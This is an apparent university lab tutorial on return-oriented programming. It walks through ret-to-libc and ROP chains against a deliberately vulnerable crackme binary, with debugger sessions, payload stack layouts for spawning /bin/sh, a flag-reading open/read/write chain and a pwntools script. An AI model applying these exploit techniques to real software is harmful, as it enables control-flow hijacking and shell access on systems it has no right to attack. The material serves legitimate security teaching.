In Lab 5, we learned that even when data execution prevention (DEP) and address-space layout randomization (ASLR) are applied, there can still be application-specific exploits that lead to full control-flow hijacking. In this tutorial, we'll learn a more generic technique called "return-oriented programming" (ROP), which can perform reasonably arbitrary computation without injecting any shellcode.
To make our tutorial easier, we'll assume code pointers are already leaked (e.g., system() and printf() in the libc library).
system()
printf()
void start() { printf("IOLI Crackme Level 0x00\n"); printf("Password:"); char buf[32]; memset(buf, 0, sizeof(buf)); read(0, buf, 256); if (!strcmp(buf, "250382")) printf("Password OK :)\n"); else printf("Invalid Password!\n"); } int main(int argc, char *argv[]) { void *self = dlopen(NULL, RTLD_NOW); printf("stack : %p\n", &argc); printf("system(): %p\n", dlsym(self, "system")); printf("printf(): %p\n", dlsym(self, "printf")); start(); return 0; }
$ checksec ./target [*] '/home/lab06/tut06-rop/target' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
Notice that NX is enabled, meaning you cannot place any shellcode in the stack or heap. However, the stack protector is disabled, which allows us to initiate a control-flow hijacking attack.
Previously, we could compute anything we wanted (such as launching an interactive shell) by jumping into our injected shellcode, but with DEP enabled, we can no longer achieve that. However, it turns out that DEP alone is still not powerful enough to completely prevent this problem.
Let's take the first step by learning a technique often called "ret-to-libc."
$ ./target stack : 0xffdcba40 system(): 0xf7d3e200 printf(): 0xf7d522d0 IOLI Crackme Level 0x00 Password:
[Task] Your first task is to trigger a buffer overflow and print out "Password OK :)"!
Your payload should look like this:
[ buf ] [ ... ] [ ra ] -> printf() [dummy] [arg 1] -> "Password OK :)"
When start() returns, it will jump to our chosen return address as before, but this time we've selected the address of printf() as the target -- that is, we're setting up a call to printf(). To do that properly, we need a dummy stack value as a placeholder for the return address that would normally be put there when a function is called with the call instruction, followed by the function's actual argument(s).
start()
call
Thus, when printf() is invoked with the payload outlined above, "Password OK :)" will be read as its first argument. As this exploit "returns" to a libc function, this technique is often called "ret-to-libc".
Let's get a shell out of this vulnerability. To do this, we're simply going to invoke the system() function instead of printf(). (Check "man system" if you're not familiar with it.)
man system
You can easily adapt the previous payload by replacing printf()'s address with that of system(), and changing the string argument:
[ buf ] [ ... ] [ ra ] -> system() [dummy] [arg 1] -> "/bin/sh"
But how do we get a pointer to "/bin/sh"? In fact, a typical process (and libc) actually contains lots of strings like that. After all, this is how system() itself is implemented -- it essentially invokes system calls like fork() and execve() on "/bin/sh" with provided arguments (you can look at its actual implementation in glibc or musl if you're interested).
"/bin/sh"
fork()
execve()
pwndbg provides a convenient interface to search for a string in memory:
$ gdb-pwndbg ./target ... pwndbg> r Starting program: /home/lab06/tut06-rop/target stack : 0xffffd540 system(): 0xf7e1a250 printf(): 0xf7e2e3a0 IOLI Crackme Level 0x00 Password:^C ... pwndbg> search "/bin" libc-2.27.so 0xf7f5b3cf das /* '/bin/sh' */ libc-2.27.so 0xf7f5c8b9 das /* '/bin:/usr/bin' */ libc-2.27.so 0xf7f5c8c2 das /* '/bin' */ libc-2.27.so 0xf7f5cdc7 das /* '/bin/csh' */ ...
There are many strings here you can use as an argument to system(). Note that all of these pointers will be different on each execution, thanks to libc's ASLR.
Our goal is to invoke system("/bin/sh") like this:
system("/bin/sh")
[ buf ] [ ... ] [ ra ] -> system() (address provided by binary: 0xf7e1a250) [dummy] [arg 1] -> "/bin/sh" (found address by searching: 0xf7f5b3cf)
Unfortunately though, as mentioned, the addresses keep changing. So how can we figure out the correct address of the "/bin/sh" string for a particular invocation of target?
target
As you learned from the "libbase" challenge in Lab 5, ASLR doesn't randomize offsets within a module, it just randomizes the base address of the entire module. (Do you know why?) So while libc as a whole has an unpredictable address, the difference between any two libc addresses will always be the same. Therefore, if you can learn the address of anything in libc, you can calculate the address of anything else in it:
0xf7f5b3cf ("/bin/sh") - 0xf7e1a250 (system()) = 0x14117f
So in your exploit, you can use system()'s address to calculate that of "/bin/sh" (e.g., (system()) + 0x14117f = ("/bin/sh")).
(system()) + 0x14117f = ("/bin/sh")
By the way, you can also calculate system()'s address (0xf7e1a250) "by hand", by finding libc's base address and system()'s offset in the library. Try vmmap in pwndbg:
0xf7e1a250
vmmap
pwndbg> vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x8048000 0x8049000 r-xp 1000 0 /home/lab06/tut06-rop/target 0x8049000 0x804a000 r--p 1000 0 /home/lab06/tut06-rop/target 0x804a000 0x804b000 rw-p 1000 1000 /home/lab06/tut06-rop/target 0xf7ddd000 0xf7fb2000 r-xp 1d5000 0 /usr/local/lib/i386-linux-gnu/libc-2.27.so 0xf7fb2000 0xf7fb3000 ---p 1000 1d5000 /usr/local/lib/i386-linux-gnu/libc-2.27.so 0xf7fb3000 0xf7fb5000 r--p 2000 1d5000 /usr/local/lib/i386-linux-gnu/libc-2.27.so 0xf7fb5000 0xf7fb6000 rw-p 1000 1d7000 /usr/local/lib/i386-linux-gnu/libc-2.27.so ...
The base address (a mapped region) of libc is 0xf7ddd000. The "x" in the "r-xp" permission bits for that region tells you that it's eXecutable (i.e., code).
0xf7ddd000
Now we know libc's base address, but where is system() located within it? You can find that with readelf like so:
readelf
$ readelf -s /usr/local/lib/i386-linux-gnu/libc-2.27.so | grep system 254: 00129870 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0 652: 0003d250 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE 1510: 0003d250 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
0x0003d250 is the beginning of the system() function inside libc, so libc's base address plus 0x0003d250 should be the address we observed previously.
0x0003d250
0xf7ddd000 (base) + 0x0003d250 (offset) = 0xf7e1a250 (system())
[Task] Can you calculate libc's base address from a leaked system() address from target? And what's the offset of "/bin/sh" in libc? Can you successfully invoke the shell?
Generating a segfault after exploitation is a bit unfortunate, so let's make the hijacked binary terminate gracefully. Our plan is to chain two library calls. This is the next step toward generic computation.
Let's chain exit() after system(), like so:
exit()
system("/bin/sh"); exit(0);
Let's think about what happens when system("/bin/sh") returns -- that is, when you exit the shell (by typing "exit" or Ctrl+C).
Have you noticed that the IP gets set to the "dummy" value when the program crashes? In other words, you can control the next return address and use this to chain an additional function call. What if we set "dummy" to the address of exit()?
[ buf ] [ ... ] [ra 1 ] -> (1) system() [ra 2 ] ---------------------> (2) exit() [arg 1] -> (1) "/bin/sh" [arg 2] ---------------------> (2) 0
When system() returns, exit() will be invoked next. You can even control its argument, as shown above (arg 2 (i.e., the argument for the second call) = 0).
[Task] Try it! You should be able to calculate the address of exit() using the techniques discussed earlier.
Unfortunately, this chaining scheme will stop working after the second call.
This week, you'll learn more generic and powerful techniques that let your payloads keep going even further. Since you're using return addresses to create a sequence of function calls, this is known as return-oriented programming (ROP).
Consider what would happen if the second function was something other than exit(), and execution continued:
[ buf ] [ ... ] [ra 1 ] -> (1) func1() [ra 2 ] ---------------------> (2) func2() [arg 1] -> (1) arg1 [arg 2] ---------------------> (2) arg2
The sequence of events is this:
func1(arg1)
func2(arg2)
After func2(arg2), "arg1" will be the next return address in this payload.
Time to learn a neat trick, a "pop/ret gadget":
[ buf ] [ ... ] [ra 1 ] -> (1) func1() [ra 2 ] ---------------------> (2) pop/ret gadget [arg 1] -> (1) arg1 [dummy]
This results in a crash at dummy!
dummy
A "pop/ret gadget" is just a pop instruction (e.g., pop eax) followed by a ret instruction. By pointing the second return address to that, the binary will (1) call func1(arg1), (2) pop "arg1" (so now the stack pointer points to "dummy"), and (3) return again (i.e., crash at "dummy").
pop
pop eax
ret
Then we can put the actual second function address there:
[ buf ] [ ... ] [ra 1 ] -> (1) func1() [ra 2 ] -----------------> (2) pop/ret gadget [arg 1] -> (1) arg1 [ra 3 ] ---------------------------------------> (3) func2() [dummy] [arg 2] ---------------------------------------> (3) arg2
When we reach "ra 3", we've essentially gone back to the very first state in which we hijacked the control flow by smashing the stack. So in order to chain func2(), we can hijack the control-flow again in the same way. (And then we could follow that with another pop/ret gadget if we wanted to call a third function, and so on!)
func2()
Although pop/ret gadgets are everywhere (check pretty much any function!), pwntools provides a useful tool to search for all interesting gadgets for you.
$ ropper -f ./target ... 0x08048479: pop ebx; ret; ...
[Task] Can you chain system("/bin/sh") and exit(0) using the pop/ret gadget, like below? [ buf ] [ ... ] [ra 1 ] -> (1) system() [ra 2 ] -----------------> (2) pop/ret gadget [arg 1] -> (1) "/bin/sh" [ra 3 ] ---------------------------------------> (3) exit() [dummy] [arg 2] ---------------------------------------> (3) 0
[Task] Can you chain system("/bin/sh") and exit(0) using the pop/ret gadget, like below?
exit(0)
[ buf ] [ ... ] [ra 1 ] -> (1) system() [ra 2 ] -----------------> (2) pop/ret gadget [arg 1] -> (1) "/bin/sh" [ra 3 ] ---------------------------------------> (3) exit() [dummy] [arg 2] ---------------------------------------> (3) 0
By the way, ropper also provides a more convenient way to search for string addresses in an ELF:
ropper
$ ropper -f /usr/local/lib/i386-linux-gnu/libc-2.27.so --string "/bin/sh" Strings ======= Address Value ------- ----- 0x0017e3cf /bin/sh
Using this "gadget", we can keep chaining multiple functions together. We can also handle functions with more than one argument, like this:
[ buf ] [ ... ] [ra 1 ] -> (1) func1() [ra 2 ] -----------------> (2) pop/ret gadget [arg 1] -> (1) arg1 [ra 3 ] -> (3) func2() [ra 4 ] -----------------> (4) pop/pop/ret gadget [arg 2] -> (3) arg2 [arg 3] -> (3) arg3 [ra 5 ] ...
func2(arg2, arg3)
Every gadget (whether it's a whole function or just part of one) ends with a ret instruction, which is what gives return-oriented-programming its name.
[Task] It's time to chain three functions! Can you invoke the three functions below in sequence?
printf("Password OK :)"); system("/bin/sh"); exit(0);
Your final job for today is to chain the following ROP payload:
open("/proc/flag", O_RDONLY); read(3, tmp_buf, 1040); write(1, tmp_buf, 1040);
More specifically, prepare the payload like this:
[ buf ] [ ... ] [ra 1 ] -> (1) open() [ra 2 ] -----------------> (2) pop/pop/ret [arg 1] -> (1) "/proc/flag" [arg 2] -> (1) 0 (O_RDONLY) [ra 3 ] -> (3) read() [ra 4 ] -----------------> (4) pop/pop/pop/ret [arg 3] -> (3) 3 (the new fd) [arg 4] -> (3) tmp_buf [arg 5] -> (3) 1040 [ra 5 ] -> (5) write() [dummy] [arg 6] -> (5) 1 (stdout) [arg 7] -> (5) tmp_buf [arg 8] -> (5) 1040
tmp_buf
"/proc/flag"
[Task] Exploit target-seccomp with your payload and submit the flag!
target-seccomp
pwntools includes a very advanced ROP library for constructing ROP payloads. Take a look at the documentation for more details, but here's a quick tour:
#!/usr/bin/env python3 from pwn import * # Override pwntools's default cache directory to your secret tmp directory # (workaround for <https://github.com/Gallopsled/pwntools/issues/2072>) os.environ['XDG_CACHE_HOME'] = './' # Our ROP chain will use gadgets from the following ELFs rop = ROP([ELF('/home/lab06/tut06-rop/target'), ELF('/usr/local/lib/i386-linux-gnu/libc-2.27.so')]) # Write a ROP chain that calls some libc functions! rop.call('system', ['/bin/sh']) rop.call('exit', [0]) # Pretty-print the finished payload print(rop.dump()) # Convert it to bytes payload = rop.chain() print(payload)
Example output:
0x0000: 0x3d250 system(['/bin/sh']) 0x0004: 0x2c58a <adjust @0xc> add esp, 4; ret 0x0008: 0x18 arg0 0x000c: 0x30420 exit(0) 0x0010: b'eaaa' <return address> 0x0014: 0x0 arg0 0x0018: b'/bin/sh\x00' b'P\xd2\x03\x00\x8a\xc5\x02\x00\x18\x00\x00\x00 \x04\x03\x00eaaa\x00\x00\x00\x00/bin/sh\x00'
This is a very convenient tool, as it can
But just like with pwntools's format-string exploit generator, you have to know how to use it properly, how to debug when things go wrong, and how to write ROP chains manually if you encounter a situation the library can't handle. In fact, the payload produced by the code above will not work as-is -- can you figure out why? (Hint: search the documentation for "base".)
base
There exists a tool called OneGadget, which searches the glibc ELF for individual gadgets that can launch a shell. We strongly recommend against using it, as it can make several of the challenges too easy. We want you to learn how to write ROP chains instead of just using an automatic tool that can do it for you. But keep it in mind if you ever play similar CTF challenges outside of our class in the future!